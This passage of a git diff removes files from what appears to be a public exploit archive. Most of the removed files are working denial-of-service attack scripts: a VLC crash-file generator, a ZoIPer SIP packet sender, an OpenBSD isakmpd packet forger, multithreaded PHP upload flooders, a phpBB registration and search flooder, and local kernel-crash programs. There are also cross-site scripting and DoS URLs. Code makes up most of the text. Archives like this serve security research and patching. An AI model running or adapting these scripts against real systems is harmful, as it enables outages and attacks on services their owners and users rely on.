vulnerability. - -Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. - -VLC Media Player 1.0.5 is vulnerable; other versions may also be affected. - -#!/usr/bin/perl - -### -# Title : VLC media player v1.0.5 (.ape) Local Crash PoC -# Author : KedAns-Dz -# E-mail : ked-h@hotmail.com -# Home : HMD/AM (30008/04300) - Algeria -(00213555248701) -# Twitter page : twitter.com/kedans -# platform : Windows -# Impact : VLC media player Just Crashed -# Tested on : Windows XP SP3 Fran�ais -# Target : VLC media player v1.0.5 -### -# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) -# ------------ -# Usage : 1 - Creat APE file ( Monkey's Audio Format ) -# => 2 - Open APE file With VLC 1.0.5 -# => 3 - Crashed !!! -# ------------ -#START SYSTEM /root@MSdos/ : -system("title KedAns-Dz"); -system("color 1e"); -system("cls"); -print "\n\n"; -print " |===========================================================|\n"; -print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n"; -print " |= [!] Exploit : Local Crash PoC =|\n"; -print " |= [!] Author : KedAns-Dz =|\n"; -print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; -print " |===========================================================|\n"; -sleep(2); -print "\n"; -# Creating ... -my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header -open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB -print file $PoC; -print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! "; -close(file); - -#================[ Exploited By KedAns-Dz * HST-Dz * ]========================= -# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > -# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ -# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX -# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , -# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah -# Messas Secondary School - Ain mlilla - 04300 - Algeria ] , -# Greets All My Friends (cit� 1850 logts - HassiMessaouD - 30008 -Algeria ) , -# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers . -# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker . -#=============================================================================== \ No newline at end of file diff --git a/platforms/multiple/remote/9987.txt b/platforms/multiple/remote/9987.txt deleted file mode 100755 index 926fc98b9..000000000 --- a/platforms/multiple/remote/9987.txt +++ /dev/null @@ -1,70 +0,0 @@ -#!/usr/bin/python - -# ZoIPer v2.22 Call-Info Remote Denial Of Service. -# Remote Crash P.O.C. -# Author: Tomer Bitton (Gr33n_G0bL1n) -# Tested on Windows XP SP2 , SP3 , Ubuntu 8.10 -# -# Vendor Notified on: 21/09/2009 -# Vendor Fix: Fixed in version 2.24 Library 5324 -# -# Bad Chars: \x20 , \x09 - -import sys -import socket -import os - - -def main(argc , argv): - - if len(sys.argv) != 2: - os.system("cls") - sys.exit("Usage: " + sys.argv[0] + " \n") - - target_host = sys.argv[1] - target_port = 5060 - - evil_packet = "\x49\x4e\x56\x49\x54\x45\x20\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31"+\ - "\x30\x2e\x30\x2e\x30\x2e\x31\x20\x53\x49\x50\x2f\x32\x2e\x30\x0d"+\ - "\x0a\x56\x69\x61\x3a\x20\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44"+\ - "\x50\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31"+\ - "\x3a\x31\x32\x39\x38\x3b\x62\x72\x61\x6e\x63\x68\x3d\x7a\x39\x68"+\ - "\x47\x34\x62\x4b\x4a\x52\x6e\x54\x67\x67\x76\x4d\x47\x6c\x2d\x36"+\ - "\x32\x33\x33\x0d\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72\x64"+\ - "\x73\x3a\x20\x37\x30\x0d\x0a\x46\x72\x6f\x6d\x3a\x20\x4d\x6f\x72"+\ - "\x70\x68\x65\x75\x73\x20\x3c\x73\x69\x70\x3a\x4d\x6f\x72\x70\x68"+\ - "\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31"+\ - "\x33\x31\x3e\x3b\x74\x61\x67\x3d\x66\x37\x6d\x58\x5a\x71\x67\x71"+\ - "\x5a\x79\x2d\x36\x32\x33\x33\x0d\x0a\x54\x6f\x3a\x20\x4e\x65\x6f"+\ - "\x20\x3c\x73\x69\x70\x3a\x4e\x65\x6f\x40\x31\x30\x2e\x30\x2e\x30"+\ - "\x2e\x31\x3e\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20\x77\x53"+\ - "\x48\x68\x48\x6a\x6e\x67\x39\x39\x2d\x36\x32\x33\x33\x40\x31\x39"+\ - "\x32\x2e\x31\x36\x38\x2e\x35\x37\x2e\x31\x33\x31\x0d\x0a\x43\x53"+\ - "\x65\x71\x3a\x20\x36\x32\x33\x33\x20\x49\x4e\x56\x49\x54\x45\x0d"+\ - "\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x3c\x73\x69\x70\x3a\x4d"+\ - "\x6f\x72\x70\x68\x65\x75\x73\x40\x31\x39\x32\x2e\x31\x36\x38\x2e"+\ - "\x35\x37\x2e\x31\x33\x31\x3e\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74"+\ - "\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69"+\ - "\x6f\x6e\x2f\x73\x64\x70\x0d\x0a\x43\x61\x6c\x6c\x2d\x49\x6e\x66"+\ - "\x6f\x3a\x20\x20\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c"+\ - "\x65\x6e\x67\x74\x68\x3a\x20\x31\x32\x35\x0d\x0a\x0d\x0a" - - os.system("cls") - print "[+] ZoIPer Call-Info Remote Denial Of Service\r\n" - print "[+] Exploited By Gr33n_G0bL1n\r\n" - print "[+] Connecting to %s on port %d\r\n" % (target_host,target_port) - - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - try: - s.connect((target_host,target_port)) - print "[+] Trying To Send Evil Packet...\r\n" - s.sendall(evil_packet) - s.close() - print "[+] Done!\r\n" - except: - print "[x] Connection Error!\r\n" - - -if (__name__ == "__main__"): - sys.exit(main(len(sys.argv), sys.argv)) - \ No newline at end of file diff --git a/platforms/multiple/webapps/24305.txt b/platforms/multiple/webapps/24305.txt deleted file mode 100755 index 690a6fcc2..000000000 --- a/platforms/multiple/webapps/24305.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/10782/info - -It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface. - -VPOP3 2.0.0k is reported prone to this issue, however, it is likely that other versions are affected as well. - -http://www.example.com:5108/messagelist.html?auth=MDA4MDA2MTQ6MTI3LjAuMC4xOmRpbWl0cmlz&msgliststart=0&msglistlen=10&sortfield=date&sortorder=A \ No newline at end of file diff --git a/platforms/multiple/webapps/24610.txt b/platforms/multiple/webapps/24610.txt deleted file mode 100755 index 0b16cc86a..000000000 --- a/platforms/multiple/webapps/24610.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/11213/info - -DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package. - -The first vulnerability reportedly allows attackers to cause the web server to consume all available CPU resources, and eventually crash the application. - -The second vulnerability is due to a failure of the application to properly sanitize user-supplied URI input. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks. - -Although these vulnerabilities are reported to exist in version 3.0.0.4 of DNS4Me, other versions may also be affected. - -http://www.example.com/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E \ No newline at end of file diff --git a/platforms/novell/remote/19541.txt b/platforms/novell/remote/19541.txt deleted file mode 100755 index 57703274e..000000000 --- a/platforms/novell/remote/19541.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/700/info - - -Novell client versions 3.0 and 3.01 for Windows platforms are vulnerable to a remotely exploitable vulnerability which could cause a denial of service. The client opens a listening tcp socket on port 427, to which if a SYN is sent, results in the machine locking with a "blue screen" error. The only solution from that point is to reset the affected computer. - - -nmap -sS -p 427 \ No newline at end of file diff --git a/platforms/openbsd/local/21167.c b/platforms/openbsd/local/21167.c deleted file mode 100755 index bc31f5c69..000000000 --- a/platforms/openbsd/local/21167.c +++ /dev/null @@ -1,129 +0,0 @@ -source: http://www.securityfocus.com/bid/3612/info - -OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation. - -Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately. - -This make it possible for a malicious local user to deny service to legitimate users of the system. - -/* obsd-crashme.c - by Marco Peereboom */ -/* December 03, 2001 */ - -#include -#include -#include -#include -#include -#include -#include - -/* globals */ -int fd[8]; /* temp pipe file descriptors */ -int fd_real[4]; /* real pipe's */ - -static int __DEBUG__ = 0; -static int __SYSLOG__ = 0; - -void enable_debug(void) -{ - __DEBUG__ = 1; -} - -void disable_debug(void) -{ - __DEBUG__ = 0; -} - -void enable_syslog(void) -{ - __SYSLOG__ = 1; -} - -void disable_syslog(void) -{ - __SYSLOG__ = 0; -} - -void s_fprintf(FILE *file, const char *fmt, ...) -{ - va_list ap; - - if (__DEBUG__) { - fflush(file); - - va_start(ap, fmt); - vfprintf(file, fmt, ap); - va_end(ap); - - fflush(file); - } - - if (__SYSLOG__) { - va_start(ap, fmt); - vsyslog(LOG_INFO, fmt, ap); - va_end(ap); - } -} - -void *s_malloc(size_t size) -{ - char serr[40]; /* can not allocate more mem so lets use this -ugly beast */ - void *p; - - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n", -getpid(), getppid(), size); - } - - if ((p = malloc(size)) == NULL ) { - sprintf(serr,"PID=%i, Could not allocate memory", -getpid()); - perror(serr); - exit(6); - } - - return p; -} - -void s_perror(const char *str) -{ - char *buf; - - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n", -getpid(), getppid(), str); - } - - buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */ - sprintf(buf, "PID=%-5i %s", getpid(), str); - perror(buf); - - free(buf); -} - -void s_pipe(int *fd) -{ - if (__DEBUG__ || __SYSLOG__) { - s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n", -getpid(), getppid(), (unsigned int)fd); - } - - if (pipe(fd) == -1) - { - s_perror("Could not create pipe"); - exit(3); - } -} - -int main(int argc, char **argv) -{ - enable_debug(); - enable_syslog(); - - fprintf(stderr, "Before pipe\n"); - s_pipe(NULL); /* test if s_pipe exits */ - fprintf(stderr, "Will never reach this\n"); - - return 0; -} diff --git a/platforms/openbsd/remote/24181.sh b/platforms/openbsd/remote/24181.sh deleted file mode 100755 index c9d9a35f0..000000000 --- a/platforms/openbsd/remote/24181.sh +++ /dev/null @@ -1,44 +0,0 @@ -source: http://www.securityfocus.com/bid/10496/info - -It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability. - -An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel. - -It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN. - -#!/bin/sh - -if [ ! $# -eq 3 ]; then - echo "usage: $0 fake_src victim spi"; - exit; -fi - -src=$1; dst=$2 -spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'` -cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null` - -dnet hex \ - $cky_i \ - "\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x08\x10\x05\x00" \ - "\x00\x00\x00\x00" \ - "\x00\x00\x00\x5c" \ - "\x01\x00\x00\x04" \ - "\x0c\x00\x00\x2c" \ - "\x00\x00\x00\x01" \ - "\x00\x00\x00\x01" \ - "\x00\x00\x00\x20" \ - "\x01\x01\x00\x01" \ - "\x00\x00\x00\x18" \ - "\x00\x01\x00\x00" \ - "\x80\x01\x00\x05" \ - "\x80\x02\x00\x02" \ - "\x80\x03\x00\x01" \ - "\x80\x04\x00\x02" \ - "\x00\x00\x00\x10" \ - "\x00\x00\x00\x01" \ - "\x03\x04\x00\x01" \ - $spi | - dnet udp sport 500 dport 500 | - dnet ip proto udp src $src dst $dst | - dnet send diff --git a/platforms/osx/local/22074.txt b/platforms/osx/local/22074.txt deleted file mode 100755 index 7eee90814..000000000 --- a/platforms/osx/local/22074.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/6331/info - -Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware. - -It has been reported that a denial of service exists in OS X. When a user creates a directory, descends it, creates another directory of the same name, then attempts to move the directory up one level in the hierarchy, the system reacts unpredictably. It has been reported that this can cause a crash of the system. - -mkdir ~/mydir; cd ~/mydir; mkdir mydir; mv mydir .. \ No newline at end of file diff --git a/platforms/osx/local/9845.c b/platforms/osx/local/9845.c deleted file mode 100755 index 0f71a4162..000000000 --- a/platforms/osx/local/9845.c +++ /dev/null @@ -1,48 +0,0 @@ -/* - Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS - ================================================== - This code should be run in a loop and due to problems - with mutex handling in ptrace a DoS can occur when a - destroyed mutex is attempted to be interlocked by OSX - kernel giving rise to a race condition. You may need - to run this code multiple times. - - - Tested against 10.5.6 - - Tested against 10.5.7 - - Tested against 10.6.1 - - while `true`;do ./prdelka-vs-APPLE-ptracepanic;done - - -- prdelka -*/ -#include -#include -#include -#include - - -int main(){ - pid_t pid; - char *argv[] = {"id","","",0}; - char *envp[] = {"",0}; - pid = fork(); - if(pid == 0){ - usleep(100); - execve("/usr/bin/id",argv,envp); - } - else{ - usleep(820); - if(ptrace(PT_ATTACH,pid,0,0)==0){ - printf("[ PID: %d has been caught!\n",pid); - if(ptrace(PT_DETACH,pid,0,0)<0){ - perror("Evil happens."); - } - usleep(1); - wait(0); - } - else{ - perror("Fail!"); - } - } - return(0); -} diff --git a/platforms/osx/remote/20845.txt b/platforms/osx/remote/20845.txt deleted file mode 100755 index e1aec57e8..000000000 --- a/platforms/osx/remote/20845.txt +++ /dev/null @@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/2716/info - -Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. - -It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack. - -ftp host - -user anonymous -pass anonymous - -mkdir -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -aaaaaaaa \ No newline at end of file diff --git a/platforms/php/remote/32769.php b/platforms/php/remote/32769.php deleted file mode 100755 index 3abb776bb..000000000 --- a/platforms/php/remote/32769.php +++ /dev/null @@ -1,10 +0,0 @@ -source: http://www.securityfocus.com/bid/33542/info - -PHP is prone to a denial-of-service vulnerability because it fails to limit global scope for certain settings relating to Unicode text operations. - -Attackers can exploit this issue to crash the affected webserver, denying service to legitimate users. - - \ No newline at end of file diff --git a/platforms/php/webapps/10242.txt b/platforms/php/webapps/10242.txt deleted file mode 100755 index f948edb44..000000000 --- a/platforms/php/webapps/10242.txt +++ /dev/null @@ -1,173 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -# -# Author: -# Eren Turkay , 2009/11/20 -# http://www.pardus.org.tr/eng/ -# -# Credits: -# Bogdan Calin from Acunetix -# -# Description: -# Exploit to cause denial of service on any host that runs PHP via temporary -# file exhaustion. It doesn't matter whether the script handles uploads or not. -# If host runs PHP, it is enough to cause DoS using any PHP script it serves. -# -# This is the implementation of disclosed vulnerability that was found -# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/ -# -# Affected versions: -# All PHP versions before PHP 5.3.1 and unpatched 5.2.11 -# -# Platforms: -# Windows, Linux, Mac -# -# Fix: -# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]: -# -# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload) -# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so) -# -# Usage: -# python php-multipart-dos.py -# -# After opening childs, you may wait long for threads to finish because sending such a huge data is painful. -# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS. -# So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you. -# Trial and error ;)) -# -# Example: -# python php-multipart-dos.py www.example.com 8080 /index.php -# -# By defalt, the program will create 100 threads, each thread will send 10 requests. -# You can specify child number to create, you may want to increase or decrease for the impact, etc.. -# -# python php-multipart-dos.py www.example.com 80 /~user/index.php 50 -# -# Notes: -# This script is for educational purposes only. Use it at your OWN risk! - -import socket -import random -import time -import threading -import sys - -class Connection: - def __init__(self, host, port): - self._host = host - self._port = port - self.sock = None - - def connect(self): - self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - self.sock.connect((self._host, self._port)) - - def send(self, msg): - if not self.sock: - raise "NotConnected" - else: - self.sock.send(msg) - - def close(self): - self.sock.close() - -class Exploit (threading.Thread): - def __init__(self, host, port, target): - self._host = host - self._port = port - self._target = target - threading.Thread.__init__(self) - - def getBoundary(self): - """ Return random boundary data """ - random.seed() - rnd = random.randrange(100000, 100000000) - data = "---------------------------%s" % rnd - return data - - def createPayload(self): - data = """POST %(target)s HTTP/1.1\r -Host: %(host)s\r -Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r -Connection: keep-alive\r -Content-Type: multipart/form-data; boundary=%(boundary)s\r -Content-Length: %(length)s\r\n\r\n""" - - boundary = self.getBoundary() - - # Create a number of upload data, 16.000, yeah! :) - for i in range(16000): - data += "--%s\r\n" % boundary - data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r -Content-Type: text/plain\r\n -Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i) - - data += "--%s--\r\n" % boundary - - return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))} - - def run(self): - payload = self.createPayload() - for i in range(0, 10): - c = Connection(self._host, self._port) - c.connect() - c.send(payload) - c.close() - sys.exit(0) - del payload - sys.exit(0) - -def usage(): - usage_data = """ - __^__ __^__ -( ___ )------------------------------------------------( ___ ) - | / | | \ | - | / | Eren Turkay , 2009/11/20 | \ | - | / | http://www.pardus.org.tr/eng/ | \ | - |___| |___| -(_____)------------------------------------------------(_____) - -PHP denial of service exploit via temporary file exhaustion -Usage: python php-multipart-dos.py - -See source code for more information -""" - - print usage_data - -if __name__ == '__main__': - if not len(sys.argv) >= 4: - usage() - else: - # is child number passed? - if len(sys.argv) >= 5: - child = int(sys.argv[4]) - else: - child = 100 - print "[+] Attack started..." - for i in range(0, child): - try: - exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3])) - exp.start() - print "[+] Opening %s childs... [%s]\r" % (child, i+1), - sys.stdout.flush() - i += 1 - except KeyboardInterrupt: - print "\n[-] Keyboard Interrupt. Exiting..." - sys.exit(1) - - # print it so that previous "Opening childs..." is still there - print "" - while True: - try: - activeChilds = threading.activeCount() - print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds, - sys.stdout.flush() - # we have one main process - if activeChilds == 1: - print "\nOK!" - sys.exit(0) - except KeyboardInterrupt: - print "\n[-] Exiting without waiting!" - sys.exit(1) \ No newline at end of file diff --git a/platforms/php/webapps/10243.txt b/platforms/php/webapps/10243.txt deleted file mode 100755 index 81627f802..000000000 --- a/platforms/php/webapps/10243.txt +++ /dev/null @@ -1,112 +0,0 @@ -#!/usr/bin/python - -# PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 -# Bogdan Calin (bogdan@acunetix.com) -# -import httplib, urllib, sys, string, threading -from string import replace -from urlparse import urlparse - -def usage(): - print "****************************************************************************" - print " PHP MultiPart Form-Data Denial of Service proof of concept" - print " Bogdan Calin (bogdan@acunetix.com)" - print "" - print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" - print "" - print " [number_of_threads] - optional, default 10" - print " [number_of_files] - optional, default 15000" - print " [data] - content of the files, by default it will create files containing" - print " the string " - print "" - print " Example: php_mpfd_dos.py http://ubuntu/index.php" - print "****************************************************************************" - -class PhpMPFDDosThread ( threading.Thread ): - # Override Thread's __init__ method to accept the parameters needed: - def __init__ ( self, host, path, files ): - self.host = host - self.path = path - self.files = files - threading.Thread.__init__ ( self ) - - # run in loop - def run(self): - while(1): - try: - self.post_data() - except: - print "*", - - # post multipart_formdata - def post_data(self): - content_type, body = self.encode_multipart_formdata() - h = httplib.HTTPConnection(self.host) - headers = { - 'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', - 'Accept': '*/*', - 'Content-Type': content_type - } - h.request('POST', self.path, body, headers) - print ".", - - # encode multipart_formdata - def encode_multipart_formdata(self): - """ - adapted from http://code.activestate.com/recipes/146306/ - files is a sequence of (name, filename, value) elements for data to be uploaded as files - Return (content_type, body) ready for httplib.HTTP instance - """ - BOUNDARY = '----------PHP_MPFD_DOS' - CRLF = '\r\n' - L = [] - for (key, filename, value) in self.files: - L.append('--' + BOUNDARY) - L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) - L.append('Content-Type: application/octet-stream') - L.append('') - L.append(value) - L.append('--' + BOUNDARY + '--') - L.append('') - body = CRLF.join(L) - content_type = 'multipart/form-data; boundary=%s' % BOUNDARY - return content_type, body - -def main(): - if len(sys.argv)<=1: - usage() - sys.exit() - - # default values - number_of_threads = 10 - number_of_files = 15000 - data = "" - - if len(sys.argv)>2: - number_of_threads = int(sys.argv[2]) - - if len(sys.argv)>3: - number_of_files = int(sys.argv[3]) - - if len(sys.argv)>4: - data = sys.argv[4] - - url = sys.argv[1] - print "[-] target: " + url - - # parse target url - up = urlparse(url) - host = up.netloc - path = up.path - - # prepare files - files = [] - for i in range(0, number_of_files): - files.append(('fu[]', 'f'+str(i), data)) - - # start the threads - for x in xrange ( number_of_threads ): - PhpMPFDDosThread(host, path, files).start() - -if __name__ == '__main__': - main() \ No newline at end of file diff --git a/platforms/php/webapps/1063.pl b/platforms/php/webapps/1063.pl deleted file mode 100755 index 46ff8d389..000000000 --- a/platforms/php/webapps/1063.pl +++ /dev/null @@ -1,146 +0,0 @@ -#!/usr/bin/perl -## Name: NsT-phpBBDoS (Perl Version) -## Copyright: Neo Security Team -## Author: HaCkZaTaN -## Ported: g30rg3_x -## Date: 20/06/05 -## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x -## A Simple phpBB Registration And Search DoS Flooder. -## -## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl -## [+] -## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN -## [+] ported to Perl By g30rg3_x -## [+] Neo Security Team -## [+] -## [+] Host |without http://www.| victimshost.com -## [+] Path |example. /phpBB2/ or /| /phpBB2/ -## [+] Flood Type |1=Registration 2=Search| 1 -## [+] .......................................................... -## [+] .......................................................... -## [+] .......................................................... -## [+] .............................................. -## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed -## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have created" - -use IO::Socket; - -## Initialized X -$x = 0; - -## Flood Variables Provided By User -print q( -NsT-phpBBDoS v0.2 by HaCkZaTaN -ported to Perl By g30rg3_x -Neo Security Team - -); -print q(Host |without http://www.| ); -$host = ; -chop ($host); - -print q(Path |example. /phpBB2/ or /| ); -$pth = ; -chop ($pth); - -print q(Flood Type |1 = Registration, 2 = Search| ); -$type = ; -chop ($type); - -## If Type Is Equals To 1 or Registration -if($type == 1){ - -## User Loop for 9999 loops (enough for Flood xDDDD) -while($x != 9999) -{ - -## Building User in base X -$uname = "username=NsT__" . "$x"; - -## Building User Mail in base X -$umail = "&email=NsT__" . "$x"; - -## Final String to Send -$postit = "$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit"; - -## Posit Length -$lrg = length $postit; - -## Connect Socket with Variables Provided By User -my $sock = new IO::Socket::INET ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp", - ); -die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; - -## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums -print $sock "POST $pth"."profile.php HTTP/1.1\n"; -print $sock "Host: $host\n"; -print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; -print $sock "Referer: $host\n"; -print $sock "Accept-Language: en-us\n"; -print $sock "Content-Type: application/x-www-form-urlencoded\n"; -print $sock "Accept-Encoding: gzip, deflate\n"; -print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; -print $sock "Connection: Keep-Alive\n"; -print $sock "Cache-Control: no-cache\n"; -print $sock "Content-Length: $lrg\n\n"; -print $sock "$postit\n"; -close($sock); - -## Print a "." for every loop -syswrite STDOUT, "."; - -## Increment X in One for every Loop -$x++; -} - -## If Type Is Equals To 2 or Search -} -elsif ($type == 2){ - -## User Search Loop for 9999 loops (enough for Flood xDDDD) -while($x != 9999) -{ -## Final Search String to Send -$postit = "search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; - -## Posit Length -$lrg = length $postit; - -## Connect Socket with Variables Provided By User -my $sock = new IO::Socket::INET ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp", - ); -die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; - -## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums -print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; -print $sock "Host: $host\n"; -print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; -print $sock "Referer: $host\n"; -print $sock "Accept-Language: en-us\n"; -print $sock "Content-Type: application/x-www-form-urlencoded\n"; -print $sock "Accept-Encoding: gzip, deflate\n"; -print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; -print $sock "Connection: Keep-Alive\n"; -print $sock "Cache-Control: no-cache\n"; -print $sock "Content-Length: $lrg\n\n"; -print $sock "$postit\n"; -close($sock); - -## Print a "." for every loop -syswrite STDOUT, "."; - -## Increment X in One for every Loop -$x++; -} -}else{ -## STF??? What Do You Type - die "Option not Allowed O_o???\n"; -} - -# milw0rm.com [2005-06-22] diff --git a/platforms/php/webapps/1064.c b/platforms/php/webapps/1064.c deleted file mode 100755 index 0b4292dc4..000000000 --- a/platforms/php/webapps/1064.c +++ /dev/null @@ -1,248 +0,0 @@ -/* --------------------------------------------------------- -[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06 --------------------------------------------------------- -Program: phpBB 2.0.15 -Homepage: http://www.phpbb.com -Vulnerable Versions: phpBB 2.0.15 & Lower versions -Risk: High Risk!! -Impact: Multiple DoS Vulnerabilities. - - -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==- ---------------------------------------------------------- - -- Description ---------------------------------------------------------- -phpBB is a high powered, fully scalable, and highly customizable -Open Source bulletin board package. phpBB has a user-friendly -interface, simple and straightforward administration panel, and -helpful FAQ. Based on the powerful PHP server language and your -choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, -phpBB is the ideal free community solution for all web sites. - -- Tested ---------------------------------------------------------- -localhost & many forums - -- Explotation ---------------------------------------------------------- -profile.php << By registering as many users as you can. -search.php << by searching in a way that the db couln't observe it. - -- Exploit ---------------------------------------------------------- -[C Source] -/* - Name: NsT-phpBBDoS - Copyright: NeoSecurityteam - Author: HaCkZaTaN - Date: 19/06/05 - Description: xD You must figure out the problem xD - - root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c - root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS - root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS - [+] NsT-phpBBDoS v0.1 by HaCkZaTaN - [+] 